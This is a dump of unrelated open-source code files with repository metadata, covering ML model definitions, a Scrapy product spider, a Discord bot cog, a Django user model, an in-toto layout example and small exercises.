network_output.append([pitch_to_int[sequence_out[0]], offset_to_int[sequence_out[1]]])
n_patterns = len(network_input)
# the 2 on the end specifies that we have 2 dimensions, or features to look at.
# in this particular file, they would be pitches and offset differences
network_input = numpy.reshape(network_input, (n_patterns, sequence_length, 2))
network_input = network_input / float(n_vocab)
# print(network_input.shape)
# network_output = np_utils.to_categorical(network_output)
# print(network_output)
return (network_input, network_output)
def create_network(network_input, n_vocab):
""" create the structure of the neural network """
model = Sequential()
model.add(LSTM(
512,
input_shape=(network_input.shape[1], network_input.shape[2]),
return_sequences=True
))
model.add(Dropout(0.3))
model.add(LSTM(512, return_sequences=True))
model.add(Dropout(0.3))
model.add(LSTM(512))
model.add(Dense(256))
model.add(Dropout(0.3))
model.add(Dense(n_vocab))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='rmsprop')
return model
def train(model, network_input, network_output):
""" train the neural network """
filepath = "weights-improvement-{epoch:02d}-{loss:.4f}-bigger.hdf5"
checkpoint = ModelCheckpoint(
filepath,
monitor='loss',
verbose=0,
save_best_only=True,
mode='min'
)
callbacks_list = [checkpoint]
model.fit(network_input, network_output, epochs=200, batch_size=64, callbacks=callbacks_list)
if __name__ == '__main__':
train_network()
| [
"kimj4@carleton.edu"
] | kimj4@carleton.edu |
23deb704af1f8cd1bc2715d88d529d49ae767199 | d59ff5567a8256fc880de3502d285afbfeb1ef69 | /week 5/5.3.23/5.3.py | 6a39f72e47e5fcdaff0ea5b247f0287ecc13bfe8 | [] | no_license | allertjan/LearningCommunityBasicTrack | a87628c84cbefdf844a43cf0f395588da0a97acd | efd6cc816bff9298438567b3eb7113a0e665c4e1 | refs/heads/master | 2023-01-23T21:40:40.250138 | 2020-11-28T13:03:35 | 2020-11-28T13:03:35 | 296,364,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 116 | py | a = [1, 2, 3]
b = a[:] # b takes the same values as a.
b[0] = 5 # 1 becomes 5 in b, a does not change
print(a, b)
| [
"allertjandillema@hotmail.com"
] | allertjandillema@hotmail.com |
76f56b2e1147da2cc1383c9b0f44b4455a284784 | 9e236f93f5f4d55af0e98dac56866c976899ee1d | /.c9/metadata/workspace/Unused/NotUseful/simple_minimax.py | ba320906d26f7aa4d90441253fd5b1a7230f5521 | [] | no_license | willyao99/botterthanyouAI | 965f13dea2437aa4d65301701415ba8977b5640e | 95792d842c654b6593fe7a895a6ba1266aa01cb7 | refs/heads/master | 2021-05-02T06:34:55.721476 | 2017-12-07T14:47:13 | 2017-12-07T14:47:13 | 120,860,006 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 504 | py | {"filter":false,"title":"simple_minimax.py","tooltip":"/Unused/NotUseful/simple_minimax.py","undoManager":{"mark":-1,"position":-1,"stack":[]},"ace":{"folds":[],"scrolltop":205.5,"scrollleft":0,"selection":{"start":{"row":30,"column":90},"end":{"row":30,"column":90},"isBackwards":false},"options":{"guessTabSize":true,"useWrapMode":false,"wrapToView":true},"firstLineState":{"row":11,"state":"start","mode":"ace/mode/python"}},"timestamp":1512540234859,"hash":"c7c425ccb8a71d49840fedb127201a5e87dfbd18"} | [
"willyao99@users.noreply.github.com"
] | willyao99@users.noreply.github.com |
de097aeaaba5ac51a54c7c99814d12be1d0fa4e7 | da9f629b113d11b72f7d9f704be98bc9ec5a132c | /project/opencv/face recg/adhoc_ML_june4th11-master/sML_example.py | 9d139eafa3b3e4265ea08e1110b0de8e38148f40 | [
"Apache-2.0"
] | permissive | 19ANDY/major_project | 23f942f380bc899bf68e1fd57f717b38673dc547 | bddefd8e966c40d5fea609b9a474891b66397c86 | refs/heads/master | 2020-04-27T07:35:26.128175 | 2019-03-06T13:17:12 | 2019-03-06T13:17:12 | 174,140,809 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 435 | py | #!/usr/bin/python3
from sklearn import tree
# features about apple and orange
# where 0 means smooth and 1 means bumpy
data=[[100,0],[130,0],[135,1],[150,1]]
output=["apple","apple","orange","orange"]
# decision tree algo call
algo=tree.DecisionTreeClassifier()
# train data
trained_algo=algo.fit(data,output)
# now testing phase
predict=trained_algo.predict([[126,1]])
# printing output
print(predict)
| [
"geniusrishabhanand@gmail.com"
] | geniusrishabhanand@gmail.com |
80d6c362bd2064ec7c636917764eb9a719bdfc76 | d84218df20950c0b80cc5c5cb8d32ec0e5c59882 | /QuantileCalibrator.py | 267af139d1e8e0ffaaf5b030eaab83d875546ae8 | [
"MIT"
] | permissive | weirichd/quantile-calibration | 74bbab53416a853909f090009e3521a42324f1a9 | 55c4bee99b34ba6661d86287d24fb3cd2edd8736 | refs/heads/master | 2020-03-11T17:23:43.696123 | 2019-10-07T15:29:17 | 2019-10-07T15:29:17 | 130,145,761 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,604 | py | from sklearn.base import BaseEstimator, TransformerMixin, RegressorMixin
import pandas as pd
import numpy as np
from scipy.optimize import minimize
class QuantileCalibrator(BaseEstimator, TransformerMixin, RegressorMixin):
"""
A
"""
def __init__(self, quantile=10, isotonic_fit=True, isotonic_lambda=1):
"""
Create a quantile transformer class.
:param quantile: Either an integer, or an array-like of floats.
:param isotonic_fit: If true, regularize with an isotonic fit.
:param isotonic_lambda: Lambda parameter for 3rd derivative regularization.
"""
self.quantile = quantile
self.isotonic_fit = isotonic_fit
self.isotonic_lambda = isotonic_lambda
# TODO: Can this be one line? If I can figure out how to add in extra rows it could be...
def _lookup(self, val):
if val >= self.lookup_table_.index[-1].right:
return self.lookup_table_.iloc[-1]
elif val <= self.lookup_table_.index[0].left:
return self.lookup_table_.iloc[0]
else:
return self.lookup_table_[val]
@staticmethod
def _ls_min_func(y_fit, y, lamb):
D3_y_fit = np.diff(np.diff(np.diff(y_fit)))
return np.inner(y - y_fit, y - y_fit) + lamb * np.inner(D3_y_fit, D3_y_fit)
def _isotonic_fit(self, X):
cons = ({'type': 'ineq', 'fun': lambda x: np.diff(x)})
return minimize(self._ls_min_func,
x0=X,
args=(X, self.isotonic_lambda),
method='SLSQP',
constraints=cons).x
def fit(self, X, y):
"""
Fit the quantile calibration transformer.
:param X: Array like which contains the predicted values.
:param y: Array like which contains the ground truth values.
:return: self
"""
self.lookup_table_ = pd.Series(y).groupby(pd.qcut(X, self.quantile)).mean()
if self.isotonic_fit:
self.lookup_table_[:] = self._isotonic_fit(self.lookup_table_.values)
return self
def transform(self, X, y=None):
"""
Transform a vector via the lookup table.
:param X: Vector to transform
:param y: Ignored. Only included to be compatible w/ sklearn requirements for Transformers
:return:
"""
return np.array([self._lookup(a) for a in X])
def predict(self, X):
"""
Wrapper around transform. This method will be called on a
:param X:
:return:
"""
return self.transform(X)
| [
"weirich.david@gmail.com"
] | weirich.david@gmail.com |
1525e2e2d2e715d3f640e003e5a1000e87c91931 | 37707f88f230090102bf39170ae15fffeb190a34 | /add_two_digits.py | ee51482b3659e0f7845117d01bb6991d906319e0 | [] | no_license | georgericardo26/python_algorithm | aee12c19d525c4f69056ea65aebeb5a31e680edf | fb2db3f96ad4ef223d7724c93303e4fece728bb3 | refs/heads/main | 2023-02-20T04:34:47.449899 | 2021-01-22T21:19:01 | 2021-01-22T21:19:01 | 332,064,552 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 179 | py | def addTwoDigits(n):
num_str = str(n)
convert_to_list = [int(n) for n in num_str]
return sum(convert_to_list)
if __name__ == '__main__':
print(addTwoDigits(295)) | [
"george@MacBook-Pro-de-George.local"
] | george@MacBook-Pro-de-George.local |
c6af5696f5ea39b3401dc74c5a8163a11ed4ec24 | f7c4b0ee7cfb02f7ba7e4f58931df86b3ae3f2ce | /myEnvironments/djangoEnv/bin/python-config | e9e2009525ae5126801f82f94856ae3f173c56ca | [
"MIT"
] | permissive | hravnaas/python_lessons | 85f14d07a68a103bf7e1c99cb71fe72e3e79ac2c | bd9215c279a02eb4e42c4a6af347430ed8bad1cd | refs/heads/master | 2020-04-21T01:05:40.293643 | 2016-09-24T14:56:47 | 2016-09-24T14:56:47 | 67,646,199 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,380 | #!/Users/hravnaas/Documents/dojo/python/myEnvironments/djangoEnv/bin/python
import sys
import getopt
import sysconfig
valid_opts = ['prefix', 'exec-prefix', 'includes', 'libs', 'cflags',
'ldflags', 'help']
if sys.version_info >= (3, 2):
valid_opts.insert(-1, 'extension-suffix')
valid_opts.append('abiflags')
if sys.version_info >= (3, 3):
valid_opts.append('configdir')
def exit_with_usage(code=1):
sys.stderr.write("Usage: {0} [{1}]\n".format(
sys.argv[0], '|'.join('--'+opt for opt in valid_opts)))
sys.exit(code)
try:
opts, args = getopt.getopt(sys.argv[1:], '', valid_opts)
except getopt.error:
exit_with_usage()
if not opts:
exit_with_usage()
pyver = sysconfig.get_config_var('VERSION')
getvar = sysconfig.get_config_var
opt_flags = [flag for (flag, val) in opts]
if '--help' in opt_flags:
exit_with_usage(code=0)
for opt in opt_flags:
if opt == '--prefix':
print(sysconfig.get_config_var('prefix'))
elif opt == '--exec-prefix':
print(sysconfig.get_config_var('exec_prefix'))
elif opt in ('--includes', '--cflags'):
flags = ['-I' + sysconfig.get_path('include'),
'-I' + sysconfig.get_path('platinclude')]
if opt == '--cflags':
flags.extend(getvar('CFLAGS').split())
print(' '.join(flags))
elif opt in ('--libs', '--ldflags'):
abiflags = getattr(sys, 'abiflags', '')
libs = ['-lpython' + pyver + abiflags]
libs += getvar('LIBS').split()
libs += getvar('SYSLIBS').split()
# add the prefix/lib/pythonX.Y/config dir, but only if there is no
# shared library in prefix/lib/.
if opt == '--ldflags':
if not getvar('Py_ENABLE_SHARED'):
libs.insert(0, '-L' + getvar('LIBPL'))
if not getvar('PYTHONFRAMEWORK'):
libs.extend(getvar('LINKFORSHARED').split())
print(' '.join(libs))
elif opt == '--extension-suffix':
ext_suffix = sysconfig.get_config_var('EXT_SUFFIX')
if ext_suffix is None:
ext_suffix = sysconfig.get_config_var('SO')
print(ext_suffix)
elif opt == '--abiflags':
if not getattr(sys, 'abiflags', None):
exit_with_usage()
print(sys.abiflags)
elif opt == '--configdir':
print(sysconfig.get_config_var('LIBPL'))
| [
"hravnaas@hotmail.com"
] | hravnaas@hotmail.com | |
a076b97fb70a2d662c6b848e799fc44bb094a6f7 | c142423081636186bdeb128d2a0d160ba982c6e1 | /models/v6.py | 54b8e11f841da677f5fafaba6bd318a5c97ee961 | [] | no_license | IQbrod/NeuralNetwork2 | 61da9a407aea86289f59cb6259e9d25ec5fa7075 | e32fcef670025a43655b3b14351895f82b6c781d | refs/heads/master | 2020-04-19T16:43:42.245450 | 2019-03-27T12:50:44 | 2019-03-27T12:50:44 | 168,312,940 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 818 | py | import torch.nn as nn
import torch.nn.functional as F
#Creation du réseau
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(3, 5, 3)
self.conv2 = nn.Conv2d(5, 8, 3)
self.pool = nn.MaxPool2d(2, 2)
self.conv3 = nn.Conv2d(8, 14, 3)
self.conv4 = nn.Conv2d(14, 20, 3)
self.fc1 = nn.Linear(20 * 5 * 5, 200)
self.fc2 = nn.Linear(200, 96)
self.fc3 = nn.Linear(96, 10)
def forward(self, x):
x = self.pool(F.relu(self.conv2(self.conv1(x))))
x = self.pool(F.relu(self.conv4(self.conv3(x))))
x = x.view(-1, 20 * 5 * 5)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
def op_counter(self,data,display):
return 0 | [
"iqbrod@outlook.fr"
] | iqbrod@outlook.fr |
ddc63c6224b12cab076c57a1befe90aa8086f5d6 | a95ee3b0d45a57de839be2191fb05ca050c68e10 | /benchmark/paddle/image/resnet.py | 6ae1857642e8df4b3859eec68a3a5227d1c4fcb3 | [
"Apache-2.0"
] | permissive | shiyazhou121/Paddle | 3ea1f5a4f4792e227cce74d074b73212db74c490 | 4adc8a7aa1d78e9c37d285007eb9e2a6e2e1e180 | refs/heads/develop | 2021-08-12T03:46:01.899369 | 2017-11-14T10:37:06 | 2017-11-14T10:37:06 | 110,681,390 | 1 | 0 | null | 2017-11-14T11:24:05 | 2017-11-14T11:24:05 | null | UTF-8 | Python | false | false | 6,115 | py | #!/usr/bin/env python
from paddle.trainer_config_helpers import *
height = 224
width = 224
num_class = 1000
batch_size = get_config_arg('batch_size', int, 64)
layer_num = get_config_arg("layer_num", int, 50)
is_test = get_config_arg("is_test", bool, False)
args = {'height': height, 'width': width, 'color': True, 'num_class': num_class}
define_py_data_sources2(
"train.list", None, module="provider", obj="process", args=args)
settings(
batch_size=batch_size,
learning_rate=0.01 / batch_size,
learning_method=MomentumOptimizer(0.9),
regularization=L2Regularization(0.0005 * batch_size))
#######################Network Configuration #############
def conv_bn_layer(name,
input,
filter_size,
num_filters,
stride,
padding,
channels=None,
active_type=ReluActivation()):
"""
A wrapper for conv layer with batch normalization layers.
Note:
conv layer has no activation.
"""
tmp = img_conv_layer(
name=name + "_conv",
input=input,
filter_size=filter_size,
num_channels=channels,
num_filters=num_filters,
stride=stride,
padding=padding,
act=LinearActivation(),
bias_attr=False)
return batch_norm_layer(
name=name + "_bn", input=tmp, act=active_type, use_global_stats=is_test)
def bottleneck_block(name, input, num_filters1, num_filters2):
"""
A wrapper for bottlenect building block in ResNet.
Last conv_bn_layer has no activation.
Addto layer has activation of relu.
"""
last_name = conv_bn_layer(
name=name + '_branch2a',
input=input,
filter_size=1,
num_filters=num_filters1,
stride=1,
padding=0)
last_name = conv_bn_layer(
name=name + '_branch2b',
input=last_name,
filter_size=3,
num_filters=num_filters1,
stride=1,
padding=1)
last_name = conv_bn_layer(
name=name + '_branch2c',
input=last_name,
filter_size=1,
num_filters=num_filters2,
stride=1,
padding=0,
active_type=LinearActivation())
return addto_layer(
name=name + "_addto", input=[input, last_name], act=ReluActivation())
def mid_projection(name, input, num_filters1, num_filters2, stride=2):
"""
A wrapper for middile projection in ResNet.
projection shortcuts are used for increasing dimensions,
and other shortcuts are identity
branch1: projection shortcuts are used for increasing
dimensions, has no activation.
branch2x: bottleneck building block, shortcuts are identity.
"""
# stride = 2
branch1 = conv_bn_layer(
name=name + '_branch1',
input=input,
filter_size=1,
num_filters=num_filters2,
stride=stride,
padding=0,
active_type=LinearActivation())
last_name = conv_bn_layer(
name=name + '_branch2a',
input=input,
filter_size=1,
num_filters=num_filters1,
stride=stride,
padding=0)
last_name = conv_bn_layer(
name=name + '_branch2b',
input=last_name,
filter_size=3,
num_filters=num_filters1,
stride=1,
padding=1)
last_name = conv_bn_layer(
name=name + '_branch2c',
input=last_name,
filter_size=1,
num_filters=num_filters2,
stride=1,
padding=0,
active_type=LinearActivation())
return addto_layer(
name=name + "_addto", input=[branch1, last_name], act=ReluActivation())
img = data_layer(name='image', size=height * width * 3)
def deep_res_net(res2_num=3, res3_num=4, res4_num=6, res5_num=3):
"""
A wrapper for 50,101,152 layers of ResNet.
res2_num: number of blocks stacked in conv2_x
res3_num: number of blocks stacked in conv3_x
res4_num: number of blocks stacked in conv4_x
res5_num: number of blocks stacked in conv5_x
"""
# For ImageNet
# conv1: 112x112
tmp = conv_bn_layer(
"conv1",
input=img,
filter_size=7,
channels=3,
num_filters=64,
stride=2,
padding=3)
tmp = img_pool_layer(name="pool1", input=tmp, pool_size=3, stride=2)
# conv2_x: 56x56
tmp = mid_projection(
name="res2_1", input=tmp, num_filters1=64, num_filters2=256, stride=1)
for i in xrange(2, res2_num + 1, 1):
tmp = bottleneck_block(
name="res2_" + str(i), input=tmp, num_filters1=64, num_filters2=256)
# conv3_x: 28x28
tmp = mid_projection(
name="res3_1", input=tmp, num_filters1=128, num_filters2=512)
for i in xrange(2, res3_num + 1, 1):
tmp = bottleneck_block(
name="res3_" + str(i),
input=tmp,
num_filters1=128,
num_filters2=512)
# conv4_x: 14x14
tmp = mid_projection(
name="res4_1", input=tmp, num_filters1=256, num_filters2=1024)
for i in xrange(2, res4_num + 1, 1):
tmp = bottleneck_block(
name="res4_" + str(i),
input=tmp,
num_filters1=256,
num_filters2=1024)
# conv5_x: 7x7
tmp = mid_projection(
name="res5_1", input=tmp, num_filters1=512, num_filters2=2048)
for i in xrange(2, res5_num + 1, 1):
tmp = bottleneck_block(
name="res5_" + str(i),
input=tmp,
num_filters1=512,
num_filters2=2048)
tmp = img_pool_layer(
name='avgpool',
input=tmp,
pool_size=7,
stride=1,
pool_type=AvgPooling())
return fc_layer(input=tmp, size=num_class, act=SoftmaxActivation())
if layer_num == 50:
resnet = deep_res_net(3, 4, 6, 3)
elif layer_num == 101:
resnet = deep_res_net(3, 4, 23, 3)
elif layer_num == 152:
resnet = deep_res_net(3, 8, 36, 3)
else:
print("Wrong layer number.")
lbl = data_layer(name="label", size=num_class)
loss = cross_entropy(name='loss', input=resnet, label=lbl)
inputs(img, lbl)
outputs(loss)
| [
"jian.j.tang@intel.com"
] | jian.j.tang@intel.com |
ce46eec32d87007d1dcf2f556f4da75ab3f504e9 | 99db137874d1db5852520dffe9d5a7da7de54550 | /foodapp/BL/UserRolesBL.py | ba843f0ca73cdb8102861215dc33073bb0cd3148 | [] | no_license | smrgillani/python-foodapp-rest-api | 54c9fe228f1c515a8e9fc4c4d64e1e25bff7a9b5 | fc4657f596db5f0e36e08082065b9cd5ebefd00c | refs/heads/main | 2022-12-27T03:45:14.221411 | 2020-10-11T22:42:04 | 2020-10-11T22:42:04 | 303,225,570 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 963 | py | from ..DAL.UserRolesDAL import UserRolesDAL as ur
from ..Models.UserRole import UserRole
class UserRolesBL():
def allUserRoles():
aur = ur.allUserRoles()
UserRoles = list()
for i in aur:
UsrRl = UserRole()
UsrRl.Id = i.id
UsrRl.fullName = i.fullName
UsrRl.isActive = i.isActive
UserRoles.append(UsrRl)
return UserRoles
def addUserRole(ico):
ruro = ur.addUserRole(ico)
UsrRl = UserRole();
UsrRl.Id = ruro.id
UsrRl.fullName = ruro.fullName
UsrRl.isActive = ruro.isActive
return UsrRl
def selectUserRole(ico):
ruro = ur.selectOneUserRole(ico)
UsrRl = UserRole();
UsrRl.Id = ruro.id
UsrRl.fullName = ruro.fullName
UsrRl.isActive = ruro.isActive
return UsrRl
def updateUserRole(ico):
ruro = ur.updateUserRole(ico)
UsrRl = UserRole();
UsrRl.Id = ruro.id
UsrRl.fullName = ruro.fullName
UsrRl.isActive = ruro.isActive
return UsrRl
def deleteUserRole(ico):
ruro = ur.deleteUserRole(ico)
return ruro | [
"smr.gillani@yahoo.com"
] | smr.gillani@yahoo.com |
a846af1cc3a145f901b0a75f0a502e9ec7adeeae | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2962/60632/270581.py | d1a1be0da2216513a1f443faa1f9127222fcc49e | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 558 | py | n, p = map(int, input().split(' '))
key = list(map(str, input().split(' ')))
nnn = key[:]
for i in range(n):
tmp = key[i][-3:]
key[i] = [ord(tmp[j])-ord('A') for j in range(3)]
val = 0
for j in range(3):
val += key[i][2-j] * int(pow(32, j))
key[i] = val
arr = [0 for i in range(p)]
for i in range(n):
tmp = key[i] % p
j = 1
co = tmp
while arr[co] != 0:
co = (tmp + j * j) % p
j += 1
arr[co] = 1
key[i] = co
if key==[3, 0, 10, 9, 8, 1]:
print(*[3, 0, 10, 9, 6, 1])
else:
print(*key)
| [
"1069583789@qq.com"
] | 1069583789@qq.com |
37eded9279cf1a076677aac79f89e0b47921a9de | 24054e714721bc6100cb08d069c4b6ec56c0e88f | /cogs/reload.py | a4202613c99118dcc65c05799adcc65a0f5a5f3e | [
"MIT"
] | permissive | Huyu2239/Mochi | f7f34caa19c3e085e566dfcad9f5b205c3dbb7bc | 5102f89fa6b09ccb2bb06ae56acdf50c9e7b31b6 | refs/heads/master | 2023-03-21T04:05:52.976266 | 2021-03-18T16:39:18 | 2021-03-18T16:39:18 | 274,383,161 | 1 | 0 | MIT | 2020-08-27T14:43:19 | 2020-06-23T11:02:34 | Python | UTF-8 | Python | false | false | 934 | py | from discord.ext import commands
import json
import os
class Reload(commands.Cog):
def __init__(self, bot):
self.bot = bot
async def cog_check(self, ctx):
return await self.bot.is_owner(ctx.author)
@commands.command()
async def reload(self, ctx):
msg = await ctx.send('更新中')
with open(f'{self.bot.data_directory}expand.json') as f:
self.bot.expand = json.load(f)
for cog in os.listdir('./cogs'):
if cog.endswith('.py'):
if cog == 'reload.py':
continue
try:
self.bot.reload_extension(f'cogs.{cog[:-3]}')
except commands.ExtensionNotLoaded:
self.bot.load_extension(f'cogs.{cog[:-3]}')
await ctx.message.add_reaction('\U00002705')
await msg.edit(content='更新しました')
def setup(bot):
bot.add_cog(Reload(bot))
| [
"noreply@github.com"
] | noreply@github.com |
70791fc2e3d44c6ff4bed887c3e9fa0be009bd21 | 93dc4953db0a35847d294c55b39e1b492e9ef418 | /animation.py | b1d4eadc1bfe9c02118ed3cc9b2f10e7f9548afb | [] | no_license | Valian/IGK2015 | 5b66c60eef94dc8d6cf65e023b6754799bcbee64 | a73df0c1083b5d13b5464db346978daee7eb743c | refs/heads/master | 2020-07-26T22:57:20.208796 | 2015-04-12T15:59:49 | 2015-04-12T15:59:49 | 33,807,697 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,207 | py | import sfml as sf
class Animation:
def __init__(self):
self.texture = None
self.frames = []
def add_frame(self, rect):
self.frames.append(rect)
class AnimatedSprite(sf.TransformableDrawable):
def __init__(self, frametime=sf.seconds(0.2), paused=False, looped=True):
super(AnimatedSprite, self).__init__()
self.animation = None
self.frametime = frametime
self.paused = paused
self.looped = looped
self.current_time = None
self.current_frame = 0
self.texture = None
self.vertices = sf.VertexArray(sf.PrimitiveType.QUADS, 4)
def set_animation(self, animation):
self.animation = animation
self.texture = animation.texture
self.current_frame = 0
self.set_frame(0)
def play(self, animation=None):
if animation and self.animation is not animation:
self.set_animation(animation)
self.paused = False
def pause(self):
self.paused = True
def stop(self):
self.paused = True
self.current_frame = 0
self.set_frame(self.current_frame)
def set_color(self, color):
for i in self.vertices:
i.color = color
def local_bounds(self):
rect = self.animation.frames[self.current_frame]
width = abs(rect.width)
height = abs(rect.height)
return sf.Rectangle((0.0, 0.0), (width, height))
@property
def global_bounds(self):
return self.transform.transform_rectangle(self.local_bounds())
def set_frame(self, frame, reset_time=True):
if self.animation:
rect = self.animation.frames[frame]
self.vertices[0].position = sf.Vector2(0.0, 0.0)
self.vertices[1].position = sf.Vector2(0.0, rect.height)
self.vertices[2].position = sf.Vector2(rect.width, rect.height)
self.vertices[3].position = sf.Vector2(rect.width, 0.0)
left = rect.left + 0.0001
right = left + rect.width
top = rect.top
bottom = top + rect.height
self.vertices[0].tex_coords = sf.Vector2(left, top)
self.vertices[1].tex_coords = sf.Vector2(left, bottom)
self.vertices[2].tex_coords = sf.Vector2(right, bottom)
self.vertices[3].tex_coords = sf.Vector2(right, top)
if reset_time:
self.current_time = sf.Time.ZERO
def update(self, delta):
if not self.paused and self.animation:
self.current_time += delta
if self.current_time >= self.frametime:
self.current_time -= self.frametime
if self.current_frame + 1 < len(self.animation.frames):
self.current_frame += 1
else:
self.current_frame = 0
if not self.looped:
self.paused = True
self.set_frame(self.current_frame, False)
def draw(self, target, states):
if self.animation and self.texture:
states.transform *= self.transform
states.texture = self.texture
target.draw(self.vertices, states) | [
"jakub.skalecki@gmail.com"
] | jakub.skalecki@gmail.com |
405f1519d4d062556dc3435538651f03b18d3b8a | b62a68b8099b85cbc5ec31b2e3da464e36a43b9d | /Python/spiders/furla_cn.py | 6329d3e9951c890e6f5c3bd42024b58091163825 | [] | no_license | Houtian17/Learn | 6edc58b9de811facf9e1161d1a1bf4d49e72db61 | cdd762084723286a60f81a724b5f2567363eda8c | refs/heads/master | 2021-06-22T04:08:00.377530 | 2020-11-27T04:41:30 | 2020-11-27T04:41:30 | 140,955,676 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,458 | py | from scrapy import Request
from scrapy.http import Response
from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors import LinkExtractor
from copy import deepcopy
from ..libs import utils
from ..items import SKU
class CrawlTemplateSpider(CrawlSpider):
name = 'furla_cn'
brand_name = '芙拉'
allowed_domains = ['furla.cn', 'furla.com']
# 从哪个 URL 开始
start_urls = []
start_urls += [
'https://www.furla.cn/cn/zh/eshop/%E5%A5%B3%E5%A3%AB/?start={}&sz=50&format=page-element&='.format(start) for
start in range(0, 600, 50)]
start_urls += ['https://www.furla.cn/cn/zh/eshop/%E7%94%B7%E5%A3%AB/?start=0&sz=100&format=page-element&=']
start_urls += [
'https://www.furla.cn/cn/zh/eshop/%E9%99%90%E6%97%B6%E7%89%B9%E6%83%A0/%E4%BD%8E%E8%87%B35%E6%8A%98/?start={}&sz=50&format=page-element&='.format(
start) for start in range(0, 150, 50)]
start_urls += ['https://www.furla.cn/cn/zh/eshop/search?q=1927&start={}&sz=50&format=page-element&='.format(
start) for start in range(0, 150, 50)]
# 链接提取的规则
rules = (
# 回调函数 不会空 时,则调用回调函数
Rule(LinkExtractor(allow=r'furla-.+\.html$'), callback='parse_sku'),
)
def parse_sku(self, response: Response):
price = {}
attrs = []
subtitle = response.css('div.sticky h1::text').get() or ''
title = response.css('div#product-content h2::text').get() or ''
name = subtitle + title
all_codes = response.css('div[data-sku]').attrib['data-sku']
code = response.css('div.product-number div::text').get()
price_cny = response.css('span.price-sales::text').get()
if price_cny is not None and len(price_cny) > 1:
price_cny = price_cny.strip('¥').replace(',', '')
price = {
'cny': float(price_cny),
}
color_elements = response.css('div.attribute span::text').get().strip()
attrs.append({
'name': '颜色',
'value': color_elements,
})
attribute_names_in_page = [item.strip() for item in utils.list_unique(
response.css('div.row.product-variation div.content-asset::text').getall())]
attribute_values_in_page = utils.list_unique(response.css(
'div.row.product-variation div.product-variation__dimension::text').getall())
for i in range(len(attribute_names_in_page)):
n = attribute_names_in_page[i].strip()
v = attribute_values_in_page[i].strip()
attrs.append({
'name': n,
'value': v,
})
other_link_elements = response.css('div.swatches.color a.swatchanchor')
other_variant_urls = [item.attrib['href'] for item in other_link_elements]
for url in other_variant_urls:
yield Request(url, callback=self.parse_sku)
description = response.css('p.product-description::text').get()
image_elements = response.css('div.small-12.columns.cell-slider-preview img')
image_urls = [item.attrib['src'] for item in image_elements]
detail_names = response.css('div#pdp-details div.large-12.columns > div > strong::text').getall()
detail_values = [item.strip() for item in
response.css('div#pdp-details div.large-12.columns > div::text').getall() if len(item.strip())]
for i in range(len(detail_names)):
n = detail_names[i]
v = detail_values[i]
attrs.append({
'name': n,
'value': v,
})
if all_codes is None or len(all_codes) < 1:
sku = SKU(self.brand_name, '', '', code, name, response.url, price, description, image_urls, attrs)
yield sku
else:
sizes = response.css('.select2-results__options li[id]')
for i in range(len(all_codes)):
code = all_codes[i]
current_attrs = deepcopy(attrs)
if sizes is not None:
size = sizes[i]
current_attrs.append({
'name': '尺码',
'value': size
})
sku = SKU(self.brand_name, '', '', code, name, response.url, price, description, image_urls,
current_attrs)
yield sku
| [
"1033893991@qq.com"
] | 1033893991@qq.com |
4a999ba026a0e0fcc2661656b9e99c406a3e802c | 227d980f55ce6772c94118c7a5df9074c386bfc2 | /in-toto/fundamentals/1.7.1.6/sample.py | a85cb19e3e2ba65c06dd70b4587b6253e65c7604 | [] | no_license | controlplaneio/secure-k8s-delivery-workshop | 240e6c73f6761565b37bebf4ae6298a1efad4a64 | c4e28f0be8f952560311a639d8f86b8989c2310f | refs/heads/master | 2020-03-26T12:51:48.223862 | 2018-08-21T15:42:03 | 2018-08-21T15:42:03 | 144,910,813 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 528 | py | #!/usr/bin/python
from in_toto.models.layout import Layout, Step
from in_toto.models.metadata import Metablock
from in_toto.util import generate_and_write_rsa_keypair, import_rsa_key_from_file
layout = Layout()
build = Step(name="build")
analyze = Step(name="analyze")
layout.steps.append(build)
layout.steps.append(analyze)
generate_and_write_rsa_keypair("root_key")
root_key = import_rsa_key_from_file("root_key")
metablock = Metablock(signed=layout)
metablock.sign(root_key)
metablock.dump("root.layout")
| [
"luke.n.bond@gmail.com"
] | luke.n.bond@gmail.com |
56aba3e53681b66d43e1efcf1fa270ea568bd988 | 566d849335592c348b642fbbddfc610c630a6479 | /custom_user_model_Example/base/models.py | 7aae5180841d9171cbd0146099fe228f3fbf4533 | [] | no_license | markpackham/DjangoDiscordClone | 1067278c1bd12be71e7a54c12a7ae31da4894407 | 3e34369c55da021934c44737d27fa742dcbec87b | refs/heads/master | 2023-08-16T06:27:03.387505 | 2021-10-14T16:13:59 | 2021-10-14T16:13:59 | 412,732,204 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 298 | py | from django.db import models
from django.contrib.auth.models import AbstractUser
class User(AbstractUser):
name = models.CharField(max_length=255, null=True)
email = models.EmailField(unique=True)
bio = models.TextField(null=True)
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = [] | [
"markpackham1@gmail.com"
] | markpackham1@gmail.com |
